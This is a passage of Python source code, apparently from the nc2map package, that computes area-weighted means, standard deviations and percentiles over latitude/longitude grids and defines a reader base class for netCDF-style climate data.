if ilat > ilon:
latslices = [(slice(None), i) for i in [0, 1, -1, -2]]
ilat = 1
lonslices = [(i, slice(None)) for i in [0, 1, -1, -2]]
ilon = 0
else:
latslices = [(i, slice(None)) for i in [0, 1, -1, -2]]
ilat = 0
lonslices = [(slice(None), i) for i in [0, 1, -1, -2]]
ilon = 1
# interpolate to left and right center
new_shape = [1 if i == ilon else lon2d.shape[ilat] for i in xrange(2)]
lon2d = np.append(
np.insert(
lon2d, 0, (2*lon2d.__getitem__(lonslices[0]) -
lon2d.__getitem__(lonslices[1])), axis=ilon),
np.reshape((2*lon2d.__getitem__(lonslices[2]) -
lon2d.__getitem__(lonslices[3])), new_shape),
axis=ilon)
lat2d = np.append(
np.insert(
lat2d, 0, (2*lat2d.__getitem__(lonslices[0]) -
lat2d.__getitem__(lonslices[1])), axis=ilon),
np.reshape((2*lat2d.__getitem__(lonslices[2]) -
lat2d.__getitem__(lonslices[3])), new_shape),
axis=ilon)
# interpolate to upper and lower center
new_shape = [1 if i == ilat else lat2d.shape[ilon] for i in xrange(2)]
lon2d = np.append(
np.insert(
lon2d, 0, (2*lon2d.__getitem__(latslices[0]) -
lon2d.__getitem__(latslices[1])), axis=ilat),
np.reshape((2*lon2d.__getitem__(latslices[2]) -
lon2d.__getitem__(latslices[3])), new_shape),
axis=ilat)
lat2d = np.append(
np.insert(
lat2d, 0, (2*lat2d.__getitem__(latslices[0]) -
lat2d.__getitem__(latslices[1])), axis=ilat),
np.reshape((2*lat2d.__getitem__(latslices[2]) -
lat2d.__getitem__(latslices[3])), new_shape),
axis=ilat)
# calculate centered longitude bounds
lon_bounds = np.array([
np.mean([lon2d[:-2,:-2], lon2d[1:-1,1:-1]], axis=0),
np.mean([lon2d[1:-1,1:-1], lon2d[2:,2:]], axis=0)])*np.pi/180.
# calculate center latitude bounds
lat_bounds = np.array([
np.mean([lat2d[:-2,:-2], lat2d[1:-1,1:-1]], axis=0),
np.mean([lat2d[1:-1,1:-1], lat2d[2:,2:]], axis=0)])*np.pi/180.
weights = np.abs(lon_bounds[0,:] - lon_bounds[1,:])*(
np.sin(lat_bounds[0,:]) - np.sin(lat_bounds[1,:]))
# tile arrays to match
tile_shape = list(self.shape)
tile_shape[ilat_orig] = 1
tile_shape[ilon_orig] = 1
if hasattr(self, 'mask'):
# tile
weights = np.ma.array(np.tile(weights, tile_shape), mask=self.mask)
# normilize now to consider for the mask
for ind in self._iter_indices(ilat_orig, ilon_orig):
weights.__setitem__(
ind,
weights.__getitem__(ind)/weights.__getitem__(ind).sum())
else:
# normalize
weights /= weights.sum()
# tile
weights = np.tile(weights, tile_shape)
if (weights < 0).any():
raise ValueError(
"Found negative weights!")
return weights
def _dict_to_recarray(self, dim_data):
try:
dim_data = dict(dim_data)
except TypeError:
return dim_data
dims = map(str, frozenset(self.dimensions + dim_data.keys()))
data = tuple(np.asarray(dim_data.get(dim)) for dim in dims)
dtypes = [np.asarray(dim_data.get(dim)).dtype for dim in dims]
shapes = [np.asarray(dim_data.get(dim)).shape for dim in dims]
dtype = zip(dims, dtypes, shapes)
return np.array(data, dtype)
def mask_outside(self, mapproj):
"""Mask data outside the boundary of a Basemap instance
Input:
- mapproj: mpl_toolkits.basemap.Basemap instance (or another object
with attributes lonmin, lonmax, latmin and latmax)
"""
self.logger.debug("Mask data to match %s", type(mapproj))
for attr in ['lonmin', 'lonmax', 'latmin', 'latmax']:
self.logger.debug(" %s: %s", attr, getattr(mapproj, attr))
indices = self._iter_indices(*self.__spatial)
lat2d, lon2d = self.grid # may also be 1d if len(self.__spatial) == 1
londata = self.lon
latdata = self.lat
if (londata < mapproj.lonmin).any():
lonminmax = londata[londata < mapproj.lonmin].max()
if (londata > mapproj.lonmax).any():
lonmaxmin = londata[londata > mapproj.lonmax].min()
if (latdata < mapproj.latmin).any():
latminmax = latdata[latdata < mapproj.latmin].max()
if (latdata > mapproj.latmax).any():
latmaxmin = latdata[latdata > mapproj.latmax].min()
for indextuple in indices:
if (londata < mapproj.lonmin).any():
self.__setitem__(
indextuple, np.ma.masked_where(
lon2d < lonminmax, self.__getitem__(indextuple),
copy=True))
if (londata > mapproj.lonmax).any():
self.__setitem__(
indextuple, np.ma.masked_where(
lon2d > lonmaxmin, self.__getitem__(indextuple),
copy=True))
if (latdata < mapproj.latmin).any():
self.__setitem__(
indextuple, np.ma.masked_where(
lat2d < latminmax, self.__getitem__(indextuple),
copy=True))
if (latdata > mapproj.latmax).any():
self.__setitem__(
indextuple, np.ma.masked_where(
lat2d > latmaxmin, self.__getitem__(indextuple),
copy=True))
return self
def _iter_indices(self, *dims):
"""Returns an iterator over all axes except those specified in *dims"""
dims = list(dims)
for i, dim in enumerate(dims):
try:
dims[i] = self.dimensions.index(dim)
except ValueError:
pass
iter_dims = [i for i in xrange(self.ndim) if i not in dims]
for l in imap(list,
product(*(range(self.shape[i]) for i in iter_dims))):
for dim in dims:
l.insert(i, slice(None))
yield tuple(l)
def mask_data(self, mask):
"""Method to mask the data array from a given boolean array. The array
must match to the shape of the longitude and latitude axis"""
indices = self._iter_indices(*self.__spatial)
for indextuple in indices:
self.__setitem__(
indextuple,
np.ma.masked_where(mask, self.__getitem__(indextuple),
copy=True))
return self
def fldmean(self, weights=None, axis='spatial', weighted=True,
keepdims=False):
"""Returns the fldmean over the axis specified by the given dimensions.
Supports masked array.
- weights: alternative weights to use (if None, the
self.gridweights property is used). The shape has to match
self.shape!
- axis: list of dimensions as they are used in self.dimensions or
None, or an integer or tuple of integers standing for the array
axis. If 'spatial', it will be replaced by the spatial axis
- weighted: True or False. If False, no weighting is used and no
weights are computed
- keepdims: bool, optional. If this is set to True, the axes which
are reduced are left in the result as dimensions with size one.
With this option, the result will broadcast correctly against the
original array.
Returns:
The weighted average over the specifid axis.
"""
if not weighted:
weights = None
elif weights is None:
weights = self.gridweights
if np.all(axis == 'spatial'):
axis = self.__spatial
try:
axis = list(axis)
dims = list(self.dimensions)
for i, ax in enumerate(axis):
if ax in dims:
axis[i] = dims.index(ax)
axis = tuple(axis)
except TypeError:
pass
mean = np.ma.average(self[:], weights=weights, axis=axis)
if not keepdims:
return mean
else:
if axis is not None:
new_shape = list(self.shape)
try:
for i in axis:
new_shape[i] = 1
except TypeError:
new_shape[axis] = 1
else:
new_shape = [1] * self.ndim
return mean.reshape(new_shape)
def fldstd(self, weights=None, axis='spatial', weighted=True,
keepdims=False):
"""Returns the standard deviation over the axis specified by the given
dimensions.
Supports masked array.
- weights: alternative weights to use (if None, the
self.gridweights property is used). The shape has to match
self.shape!
- axis: list of dimensions as they are used in self.dimensions or
None, or an integer or tuple of integers standing for the array
axis. If 'spatial', it will be replaced by the spatial axis
- weighted: True or False. If False, no weighting is used and no
weights are computed
- keepdims: bool, optional. If this is set to True, the axes which
are reduced are left in the result as dimensions with size one.
With this option, the result will broadcast correctly against the
original array.
Returns:
The weighted standard deviation over the specifid axis.
"""
if not weighted:
weights = None
elif weights is None:
weights = self.gridweights
if np.all(axis == 'spatial'):
axis = self.__spatial
try:
axis = list(axis)
dims = list(self.dimensions)
for i, ax in enumerate(axis):
if ax in dims:
axis[i] = dims.index(ax)
elif ax < 0:
axis[i] += self.ndim
axis = tuple(axis)
except TypeError:
if axis is not None and axis < 0:
axis += self.ndim
if weights is None:
return np.ma.std(self[:], axis=axis)
wtot = weights.sum(axis)
mean = self.fldmean(weights, axis, keepdims=True)
rshape = list(self.shape)
if axis is not None:
try:
for i in xrange(self.ndim):
if i not in axis:
rshape[i] = 1
except TypeError:
for i in xrange(self.ndim):
if i != axis:
rshape[i] = 1
mean = np.tile(mean, rshape)
std = np.ma.sqrt(np.sum(weights*(self[:]-mean)**2, axis=axis)/wtot)
if not keepdims:
return std
else:
if axis is not None:
new_shape = list(self.shape)
try:
for i in axis:
new_shape[i] = 1
except TypeError:
new_shape[axis] = 1
else:
new_shape = [1] * self.ndim
return std.reshape(new_shape)
def percentile(self, q, weights=None, axis='spatial',
keepdims=False, weighted=True):
""" Very close to numpy.percentile, but supports weights and masked
arrays.
Input:
- q: float in range of [0,100] (or sequence of floats)
Percentile to compute which must be between 0 and 100 inclusive.
- weights: alternative weights to use (if None, the
self.gridweights property is used). The shape has to match
self.shape. During the calculation, the weights are normalized
along the specified axis.
- axis: int or sequence of strings and int, optional. Axis along
which the percentiles are computed. Strings must match a name in
self.dimensions. If axis is None, the percentiles are computed
along a flattened version of the array. If 'spatial', it will be
replaced by the spatial axis
- weighted: True or False. If False, no weighting is used and no
weights are computed
- keepdims: bool, optional. If this is set to True, the axes which
are reduced are left in the result as dimensions with size one.
With this option, the result will broadcast correctly against the
original array.
Returns
percentile: scalar or ndarray
If a single percentile `q` is given and axis=None a scalar is
returned. If multiple percentiles `q` are given an array holding
the result is returned. The results are listed in the first axis.
(If `out` is specified, in which case that array is returned
instead). If the input contains integers, or floats of smaller
precision than 64, then the output data-type is float64. Otherwise,
the output data-type is the same as that of the input.
quantile weights that are used for computing the percentiles, are
computed via the cumulative sum (nweights are the normalized weights)
quantile_weights = np.cumsum(nweights, axis=axis) - 0.5 * nweights
Percentiles are linearly interpolated using the np.interp function.
"""
data = self[:].copy()
q = np.array(q, dtype=float).copy()
if not q.ndim:
q = np.array([q])
reduce_shape = True if not keepdims else False
else:
reduce_shape = False
if np.all(axis == 'spatial'):
axis = self.__spatial
try:
axis = list(axis)
dims = list(self.dimensions)
for i, ax in enumerate(axis):
if ax in dims:
axis[i] = dims.index(ax)
axis = tuple(axis)
reshape = True
except TypeError:
reshape = False
try:
if axis is not None and axis < 0:
axis = data.ndim - axis
except TypeError:
pass
if not weighted:
weights = np.ma.array(np.ones(data.shape), mask=data.mask)
elif weights is None:
weights = self.gridweights
else:
if not np.ndim(weights) == data.ndim or not np.all(
np.shape(weights) == data.shape):
raise ValueError(
"Shape of weights (%s) has to match the shape of data "
"(%s)!" % (np.shape(weights), data.shape))
weights = np.ma.array(weights, mask=data.mask).copy()
if not (np.all(q >= 0) and np.all(q <= 100)):
raise ValueError('q should be in [0, 100]')
if np.any(weights < 0):
raise ValueError('Weights must not be smaller than 0!')
q /= 100.
if reshape:
for ax in axis:
data = np.rollaxis(data[:], ax, 0)
weights = np.rollaxis(weights[:], ax, 0)
data = data.reshape([np.product(data.shape[:len(axis)])] + list(
data.shape[len(axis):]))
weights = weights.reshape([np.product(weights.shape[:len(axis)])] \
+ list(weights.shape[len(axis):]))
axis = 0
elif axis is not None:
data = np.rollaxis(data[:], axis, 0)
weights = np.rollaxis(weights[:], axis, 0)
axis = 0
if axis is None:
data = data.ravel()
weights = weights.ravel()
sorter = np.ma.argsort(data)
data = data[sorter]
weights = weights[sorter]
else:
sorter = np.ma.argsort(data, axis=axis)
indices = map(list, product(*(
range(ndim) for i, ndim in enumerate(data.shape)
if i != axis)))
for ind in indices:
ind.insert(axis, slice(None))
data.__setitem__(
ind, data.__getitem__(ind)[
sorter.__getitem__(ind)])
weights.__setitem__(
ind, weights.__getitem__(ind)[
sorter.__getitem__(ind)])
weights /= weights.sum(axis) # normalize weights
weights = np.ma.cumsum(weights, axis=axis) - 0.5 * weights
if axis is None:
mask = data.mask == False
pctl = np.interp(q, weights[mask], data[mask])
else:
indices = imap(list, product(*(
range(ndim) for i, ndim in enumerate(data.shape)
if i != axis)))
indices2 = imap(list, product(*(
range(ndim) for i, ndim in enumerate(data.shape)
if i != axis)))
pctl = np.zeros([len(q)] + [
s for i, s in enumerate(data.shape) if i != axis])
for ind1, ind2 in izip(indices, indices2):
ind2.insert(axis, slice(None))
mask = data.mask.__getitem__(ind2) == False
pctl.__setitem__(tuple([slice(None)] + ind1), np.interp(
q, weights.__getitem__(ind2)[mask],
data.__getitem__(ind2)[mask]))
if reduce_shape:
pctl = pctl[0]
return pctl
def shift_data(self, mapproj):
"""Shift the data to match the Basemap instance boundaries
Input:
- mapproj: mpl_toolkits.basemap.Basemap instance (or another object
with attributes lonmin and lonmax)
"""
def shift_to_larger(indextuple, val):
"""shift to larger longitudes if lonmin < mapproj.lonmin"""
if lonmax < val:
data, lon = iter(bm.shiftgrid(
lonmax, self.__getitem__(indextuple), lonold))
else:
data, lon = self.__getitem__(indextuple), lonold
shifteddata = iter(bm.shiftgrid(
val, self.__getitem__(indextuple), lon))
self.__setitem__(indextuple, next(shifteddata))
self.lon = next(shifteddata)
def shift_to_smaller(indextuple, val):
"""shift to smaller longitudes if lonmax > mapproj.lonmax"""
if lonmin > val:
data, lon = iter(bm.shiftgrid(
lonmin, self.__getitem__(indextuple), lonold,
start=False))
else:
data, lon = self.__getitem__(indextuple), lonold
shifteddata = iter(bm.shiftgrid(
val, data, lon,
start=False))
self.__setitem__(indextuple, next(shifteddata))
self.lon = next(shifteddata)
self.logger.debug("Shift data to match %s", type(mapproj))
# shift data
if len(self.lon.shape) == 1:
self.logger.debug(" Longitude is 1d --> shift")
if len(self.__spatial) == 1:
self.logger.debug(
" Found one-dimensional data --> ")
if mapproj.lonmin < 0:
self.logger.debug(" decrease all > 180.")
self.lon[self.lon > 180.] -= 360.
elif mapproj.lonmax > 180.:
self.logger.debug(" increase all < 0.")
self.lon[self.lon < 0.] += 360.
return self
# shiftgrid does only support 2 dimensional arrays. Therefore we
# loop through the other indices
indices = imap(list, product(*(
range(ndim) for i, ndim in enumerate(self.shape)
if self.dimensions[i] not in [self.__lat, self.__lon])))
lonold = self.lon.copy()
lonmin = lonold.min()
lonmax = lonold.max()
self.logger.debug(" Minimum longitude of data: %s", lonmin)
self.logger.debug(" Minimum longitude of Basemap: %s",
mapproj.lonmin)
self.logger.debug(" Maximal longitude of data: %s", lonmax)
self.logger.debug(" Maximal longitude of Basemap: %s",
mapproj.lonmax)
if lonmin <= mapproj.lonmin:
val = lonold[lonold <= mapproj.lonmin].max()
self.logger.debug(" --> Shift to the right to %s", val)
shift = lambda indextuple: shift_to_larger(indextuple, val)
shift_lon = True
elif lonmax >= mapproj.lonmax:
val = lonold[lonold >= mapproj.lonmax].min()
self.logger.debug(" --> Shift to the left to %s", val)
shift = lambda indextuple: shift_to_smaller(indextuple, val)
shift_lon = True
else:
self.logger.debug(" Longitude 1d but no shift necessary")
shift_lon = False
ilat = self.dimensions.index(self.__lat)
ilon = self.dimensions.index(self.__lon)
if shift_lon:
for i, indextuple in enumerate(indices):
indextuple.insert(ilat, slice(None))
indextuple.insert(ilon, slice(None))
shift(indextuple)
self.logger.debug(" Performed shifts in total: %i", i+1)
else:
self.logger.debug(" Longitude is not 1d --> no shift")
return self
def __getitem__(self, key):
return self.__data[key]
def __setitem__(self, key, item):
self.__data[key] = item
def __getattr__(self, attr):
if attr in self.__class__.__dict__.keys():
return getattr(self, attr)
else:
return getattr(self.__data, attr)
def __dir__(self):
return dir(super(DataField, self)) + dir(self.__data)
def __len__(self):
return "%i dimensional DataField instance of %s" % (
len(self.dimensions), self.__var)
def __str__(self):
return repr(self)[1:-1]
def check_dims(self, raise_error=False):
"""Function to check whether the data, it's shape and the given
dimensions match."""
shape = self.__data.shape
nshape = len(shape)
ndims = len(self.dimensions)
self.logger.debug("Checking dimensions and shapes")
self.logger.debug("Dimensions: %s", ', '.join(self.dimensions))
if nshape != ndims:
msg = (
"Shape of data (%i) does not match to shape of specified "
"dimensions (%i)!") % (nshape, ndims)
if raise_error:
raise ValueError(msg, logger=self.logger)
else:
critical(msg, logger=self.logger)
for idim, dim in enumerate(self.dimensions):
try:
dimlen = len(self.dims[dim])
if shape[idim] != dimlen:
msg = (
"Length of dimensions data for %s (%i) does not match "
"to the shape (%i).") % (dim, dimlen, shape[idim])
if raise_error:
raise ValueError(msg, logger=self.logger)
else:
critical(msg, logger=self.logger)
except (KeyError, TypeError):
msg = "Did not find dimension %s in dimension data!" % dim
if raise_error:
raise ValueError(msg)
else:
critical(msg, logger=self.logger)
def set_logger(self, name=None, force=False):
"""This function sets the logging.Logger instance in the MapsManager
instance.
Input:
- name: name of the Logger (if None: it will be named like
<module name>.<class name>)
- force: True/False (Default: False). If False, do not set it if the
instance has already a logger attribute."""
if name is None:
name = '%s.%s' % (self.__module__, self.__class__.__name__)
if not hasattr(self, 'logger') or force:
self.logger = logging.getLogger(name)
self.logger.debug('Initializing...')
class ReaderBase(object):
"""Base class defining the principle methods for nc2map.readers
Parameters
----------
meta: dict
Global meta data of the ArrayReader instance
timenames: set of strings
Dimension and variable names that shall be considered as time
dimension or variable
levelnames: set of strings
Dimension and variable names that shall be considered as level
dimension or variable
lonnames: set of strings
Dimension and variable names that shall be considered as longitude
dimension or variable
latnames: set of strings
Dimension and variable names that shall be considered as latitude
dimension or variable
udims: set of strings
Dimension names that indicates that the variable is defined on an
unstructured grid
ufuncs: list
list containing interpretation instances for unstructered grids
(see below). Default grid interpretation instances are for
the ugrid conventions of triangular grids and for the ICON grid.
**data
var={'data': arr, 'dims': (dim1, dim2, ...)}}
var is a string standing for the variable name,
value of 'data' is the data array of the variable, value of
'dims' is a list of dimension names. Each dimension name must
correspond to the specific axes in arr.shape
Attributes
----------
lonnames: name of the longitude variable
lon: longitude variable
latnames: name of the latitude variable
lat: latitude variable
timenames: name of the time variable
time: time variable
levelnames: name of the level variable
level: level variable
udims: set of dimensions that identify an unstructered variable
ufuncs: list of instances that are used the interpretation of an
unstructured grid
variables: dictionary containing the variables
Notes
-----
instances in `ufunc` must have a get_triangles method accepting three
parameters: a reader, a variable and a boolean. They must furthermore
return the centered longitudes, latitudes and a
matplotlib.tri.Triangulation instance with the triangle definitions.
See Also
--------
nc2map.readers.get_triangle_ugrid: interpretation function for UGRID
convention
nc2map.readers.get_triangle_icon: ICON interpretation function"""
# ----- property definitions
lon = dimprop('lon', "Longitude variable (if found)")
lat = dimprop('lat', "Latitude variable (if found)")
time = dimprop('time', "Time variable data (if found)")
level = dimprop('level', "Level variable data (if found)")
timenames = dimlist('timenames')
levelnames = dimlist('levelnames')
latnames = dimlist('latnames')
lonnames = dimlist('lonnames')
@property
def lola_variables(self):
"""Dictionary with variables containing longitude and latitude
dimension"""
return OrderedDict([
item for item in self.variables.items()
if ((self._lonnames.intersection(_get_dims(item[1])) and
self._latnames.intersection(_get_dims(item[1]))) or
self._udim(item[1])) and
item[0] not in [self.lonnames, self.latnames]])
@property
def grid_variables(self):
"""Dictionary with variables being latitude, longitude, time or
level. Latitude dimension is stored in lat, longitude in lon, time
in time and level in level."""
dimensions = frozenset(chain(*(
_get_dims(var) for var in self.variables.values())))
return OrderedDict([
(var, self.variables.get(var)) for var in dimensions])
@property
def time_variables(self):
"""Dictionary with variables containing the time dimension"""
return OrderedDict([
item for item in self.variables.items()
if self.timenames in _get_dims(item[1])])
@property
def level_variables(self):
"""Dictionary with variables containing the time dimension"""
return OrderedDict([
item for item in self.variables.items()
if self.levelnames in _get_dims(item[1])])
@property
def dttime(self):
"""Time array with datetime.datetime instances"""
time = self.time
if time is None:
raise ValueError("Could not find time variable with name %s" %
self._timenames)
return self.convert_time(self.time, self.timenames)
def __init__(self, meta={}, timenames=defaultnames['timenames'],
levelnames=defaultnames['levelnames'],
lonnames=defaultnames['lonnames'],
latnames=defaultnames['latnames'],
udims=defaultnames['udims'], ufuncs=ufuncs,
**data):
"""Initialization method for ArrayReader instance
Parameters
----------
meta: dict
Global meta data of the ArrayReader instance
timenames: set of strings
Dimension and variable names that shall be considered as time
dimension or variable
levelnames: set of strings
Dimension and variable names that shall be considered as level
dimension or variable
lonnames: set of strings
Dimension and variable names that shall be considered as longitude
dimension or variable
latnames: set of strings
Dimension and variable names that shall be considered as latitude
dimension or variable
udims: set of strings
Dimension names that indicates that the variable is defined on an
unstructured grid
ufuncs: list
list containing interpretation instances for unstructered grids
(see below). Default grid interpretation instances are for
the ugrid conventions of triangular grids and for the ICON grid.
**data
var={'data': arr, 'dims': (dim1, dim2, ...)}}
var is a string standing for the variable name,
value of 'data' is the data array of the variable, value of
'dims' is a list of dimension names. Each dimension name must
correspond to the specific axes in arr.shape
Notes
-----
instances in `ufunc` must have a get_triangles method that accepts
three parameters, a reader, a variable and a boolean. They must
furthermore return the centered longitudes, latitudes and a
matplotlib.tri.Triangulation instance with the triangle definitions.
If they cannot interprete the grid, a
:class:`~nc2map.readers.GridError` should be raised.
See Also
--------
nc2map.readers.get_triangle_ugrid: interpretation function for UGRID
convention
nc2map.readers.get_triangle_icon: ICON interpretation function
"""
self.set_logger()
self.timenames = timenames
self.levelnames = levelnames
self.lonnames = lonnames
self.latnames = latnames
self.udims = udims
self.ufuncs = ufuncs
self.meta = OrderedDict(meta).copy()
self.logger.debug("Dimension names:")
for attr in ['timenames', 'levelnames', 'lonnames', 'latnames',
'udims']:
self.logger.debug(" %s: %s", attr, locals()[attr])
self.variables = OrderedDict()
for var, var_dict in data.items():
vardims = var_dict['dims']
self.variables[var] = Variable(
var_dict['data'], var, var_dict['dims'],
meta=var_dict.get('meta', {}))
self.logger.debug("Dimensions found:")
for attr in ['timenames', 'levelnames', 'lonnames', 'latnames']:
self.logger.debug(
" %s as %s dimension.", getattr(self, attr),
attr.replace('names', ''))
def get_coords(self, varo):
"""Return the coordinates as a dictionary corresponding to a variable
Parameters
----------
varo: object
:class:`~nc2map.readers.Variable` or netCDF4.Variable instance
Returns
-------
dict: dictionary with keys being coordinate names, and values the
variable"""
if not self._udim(varo):
return {key: val for key, val in self.grid_variables.items()
if key in _get_dims(varo)}
else:
for ini in self.ufuncs:
self.logger.debug(" Try %s", ini.__class__.__name__)
try:
coords = ini.get_coords(self, varo)
for dim in set(
_get_dims(varo)).intersection(self.variables):
coords[dim] = self.variables[dim]
return coords
except GridError:
self.logger.debug(" Failed.", exc_info=True)
raise GridError(
"No class could interprete the unstructered grid!")
def convert_time(self, times, tname=None):
"""Converts the time variable instance into array of datetime
instances.
Supports relative (e.g. days since 1989-6-15 12:00) and absolute time
units (day as %Y%m%d.%f)"""
if isinstance(times[0], dt.datetime):
return times[:]
meta = self.get_meta(tname or times.name)
try:
units = meta['units']
except KeyError:
raise ValueError("Could not determine units of time variable")
try:
calendar = meta['calendar']
except KeyError:
warn("Could not determine calendar. Hence I assume the 'standard' "
"calendar.", Nc2MapRuntimeWarning)
calendar = 'standard'
try: # try interpretation of relative time units
self.logger.debug("Try netCDF4.num2date function")
dts = nc.num2date(times[:], units=units, calendar=calendar)
except ValueError: # assume absolute time units
self.logger.debug("Failed. Test for absolute time...", exc_info=1)
if not units == 'day as %Y%m%d.%f':
raise ValueError("Could not interprete time units %r" %
units)
days = np.floor(times[:]).astype(int)
subdays = np.asarray(times[:] - days)
days = np.asarray(map(lambda x: "%08i" % x, days))
dts = np.array(
map(lambda x: (dt.datetime.strptime(x[0], "%Y%m%d") +
dt.timedelta(days=x[1])),
zip(days, subdays)))
return np.array(map(np.datetime64, dts))
def get_triangles(self, varo, convert_spatial,
min_circle_ratio=defaults['min_circle_ratio']):
"""Method to get the unstructered grid
Parameters
----------
varo: object
variable object containing the data (only used for compatibility)
convert_spatial: bool, optional
Default: True. If this is True, and the spatial dimensions
(latitudes, longitudes) are in radians, they are converted to
degrees
min_circle_ratio: float, optional
Minimal circle ratio. If not 0, the
maplotlib.tri.TriAnalyzer.get_flat_tri_mask method is used to
mask very flat triangles. Defaults to
:attr:`nc2map.defaults.readers`['min_circle_ratio']
Returns
-------
lon: 1D-array of longitudes
lat: 1D-array of latitudes
triang: matplotlib.tri.Triangulation instance with the triangle
definitions
See Also
--------
ufuncs: List of classes that are used for the interpretation of
unstructered grids, each standing for a different convention.
Notes
-----
This method is used by the
:meth:`~nc2map.readers.ReaderBase.get_data` method."""
self.logger.debug("Interprete unstructered grid...")
for ini in self.ufuncs:
self.logger.debug(" Try %s", ini.__class__.__name__)
try:
lon, lat, triang = ini.get_triangles(self, varo,
convert_spatial)
if min_circle_ratio:
tria = TriAnalyzer(triang)
triang.set_mask(
tria.get_flat_tri_mask(min_circle_ratio))
return lon, lat, triang
except GridError:
self.logger.debug(" Failed.", exc_info=True)
raise GridError(
"No class could interprete the unstructered grid!")
def convert_spatial(self, varo, units=None, raise_error=True, vname=None):
"""Converts radians to degrees
Parameters
----------
varo: object
A variable object (e.g. nc2map.readers.Variable or
netCDF4.Variable)
raise_error: bool
Raise an error if `varo` does not have a units attribute
Returns
-------
arr: dimension data in degrees
Raises
------
ValueError
If `varo` does not have a units attribute and `raise_error`
Note
----
This method only calculates if varo.units == 'radian'"""
self.logger.debug("Converting spatial dimension %s" % varo)
try:
self.get_meta(vname or varo.name)['units']
except KeyError:
if units is None:
raise ValueError(
"Could not determine units of the spatial variable")
if units == 'radian':
self.logger.debug(" Found radians")
out = varo[:] * 180./np.pi
else:
self.logger.debug(" No radians")
out = varo[:]
return out
def set_logger(self, name=None, force=False):
"""This function sets the logging.Logger instance in the MapsManager
instance.
Input:
- name: name of the Logger (if None: it will be named like
<module name>.<class name>)
- force: True/False (Default: False). If False, do not set it if the
instance has already a logger attribute."""
if name is None:
name = '%s.%s' % (self.__module__, self.__class__.__name__)
if force or not hasattr(self, 'logger'):
self.logger = logging.getLogger(name)
self.logger.debug('Initializing...')
def _udim(self, var):
"""Test if the variable is unstructured"""
udim = self.udims.intersection(_get_dims(var))
udim = None if not udim else list(udim)[0]
return udim
def get_time_slice(self, index):
"""Gets the time slice by using the numpy.datetime64 class and
returns the index using the numpy.searchsorted function
Input:
- Index: list or list of objects suitable for the np.datetime64
routine. Possibilities are
-- Integer or slice (than nothing happens and they are
returned)
-- datetime.datetime instances
-- numpy.datetime64 instances
-- isoformat ('YYYY-mm-ddTHH:MM:SS') strings or part of them
(e.g. '2005' will be interpreted as year 2005, '2005-03'
will be interpreted as March, 2005)
"""
if isinstance(index, (int, slice)):
return index
try:
if isinstance(index[0], (int, slice)):
if any(not isinstance(idx, (int, slice)) for idx in index):
raise ValueError(
"Some but not all values are integers or slices!")
return index
except (TypeError, IndexError):
pass
if self.dttime is None:
raise ValueError(
"Could not find (or interpret) time variable in Reader!")
times = self.dttime
try: # try isoformat
t = np.datetime64(index).astype(times.dtype)
except ValueError:
try:
t = np.array(map(np.datetime64, index)).astype(times.dtype)
except TypeError:
raise ValueError("Could not interpret time information!")
return times.searchsorted(t)
def merge(self, *args, **kwargs):
"""Merge multiple readers into one.
Arguments may be instances of the ArrayReader class
Keyword arguments may be
- copy: True/False (Default: False). If True, the data is copied.
- close: True/False (Default: False). If True, the old reader
instances are closed
Please note:
1.) All readers must have the same grid
2.) Only one of the following can be fullfilled
a.) Each has different variables
b.) Each has different time steps
c.) Each has different levels
"""
def check_dims(*readers):
"""Checks whether the reader dimensions match to this one and
prints warnings and raises errors
Input:
- reader: ArrayReader instance
Output:
- dictionary with matches"""
# ---- check grid sizes ----
readers = list(readers) + [self]
lon_reader = [reader for reader in readers if reader.lon]
if lon_reader:
lon_reader = lon_reader[0]
for reader in readers:
if reader == lon_reader or not reader.lon:
continue
if len(lon_reader.lon) == len(reader.lon):
# raise warning if lens match anyway
if np.any(lon_reader.lon[:] != reader.lon[:]):
critical(
"Attention! Only size of longitudinal grid of"
" %s matches!" % type(reader))
else:
raise ValueError(
"Longitudes of %s do not match!" % (
type(reader)))
lat_reader = [reader for reader in readers if reader.lat]
if lat_reader:
lat_reader = lat_reader[0]
for reader in readers:
if reader == lat_reader or not reader.lat:
continue
if len(lat_reader.lat) == len(reader.lat):
if np.any(lat_reader.lat[:] != reader.lat[:]):
# raise warning if lens match anyway
critical(
"Attention! Only size of latitudinal grid of "
"%s matches!" % type(reader))
else:
raise ValueError(
"Latitudes of %s do not match!" % (
type(reader)))
checks = {}
variables = [
set(reader.variables.keys()) -
set(reader.grid_variables.keys())
for reader in readers]
all_times = [set(reader.dttime) for reader in readers
if reader.time is not None]
all_levels = [set(reader.level[:]) for reader in readers
if reader.level is not None]
for key, base_dims in [('variables', variables),
('times', all_times),
('levels', all_levels)]:
self.logger.debug("Check if %s match...", key)
if not base_dims:
continue
for i, dims in enumerate(base_dims):
for j, dims2 in enumerate(base_dims):
if i == j:
continue
if dims.isdisjoint(dims2):
self.logger.debug(
"Reader %i does not match reader %i", i, j)
checks[key] = False
else:
checks[key] = True
break
return checks, readers
self.logger.debug("Start merging readers...")
self.logger.debug("Input:")
for i, reader in enumerate([self] + list(args)):
self.logger.debug("--------- Reader %i ---------", i)
self.logger.debug("%s", reader)
copy = kwargs.get('copy', False)
close = kwargs.get('close', False)
checks, readers = check_dims(*args)
false_checks = len([check for check in checks.values() if not check])
if false_checks != 1:
if not false_checks:
raise ValueError(
"Don't now how to merge the readers! The must have either "
"all different variables, times or levels!")
raise ValueError(
"I can either merge different variables, different times or "
"different levels, but not different %s simultaneously!" % (
' and '.join(
key for key, val in checks.items() if not val)))
data = {}
if not checks['variables']:
for reader in readers:
for var, obj in reader.variables.items():
if copy:
data[var] = {
'data': obj[:].copy(), 'dims': _get_dims(obj)[:],
'meta': reader.get_meta(var=var).copy()}
else:
data[var] = {
'data': obj[:], 'dims': _get_dims(obj)[:],
'meta': reader.get_meta(var=var)}
elif not checks['times']:
stime = self.timenames
for var, obj in self.variables.items():
data[var] = {
'data': obj[:], 'dims': _get_dims(obj)[:],
'meta': self.get_meta(var=var).copy()}
for reader in readers[:-1]:
indices = np.searchsorted(self.dttime, reader.dttime,
sorter=np.argsort(self.dttime))
for var, obj in self.variables.items():
if stime not in _get_dims(obj):
continue
data[var]['data'] = np.insert(
data[var]['data'], indices, obj[:],
axis=list(_get_dims(obj)).index(reader.timenames))
elif not checks['levels']:
slevel = self.levelnames
for var, obj in self.variables.items():
data[var] = {
'data': obj[:], 'dims': _get_dims(obj)[:],
'meta': self.get_meta(var=var).copy()}
for reader in readers[:-1]:
indices = np.searchsorted(self.level[:], reader.level[:])
# if levels are reversed --> reverse indices
if self.level[-1] < self.level[0]:
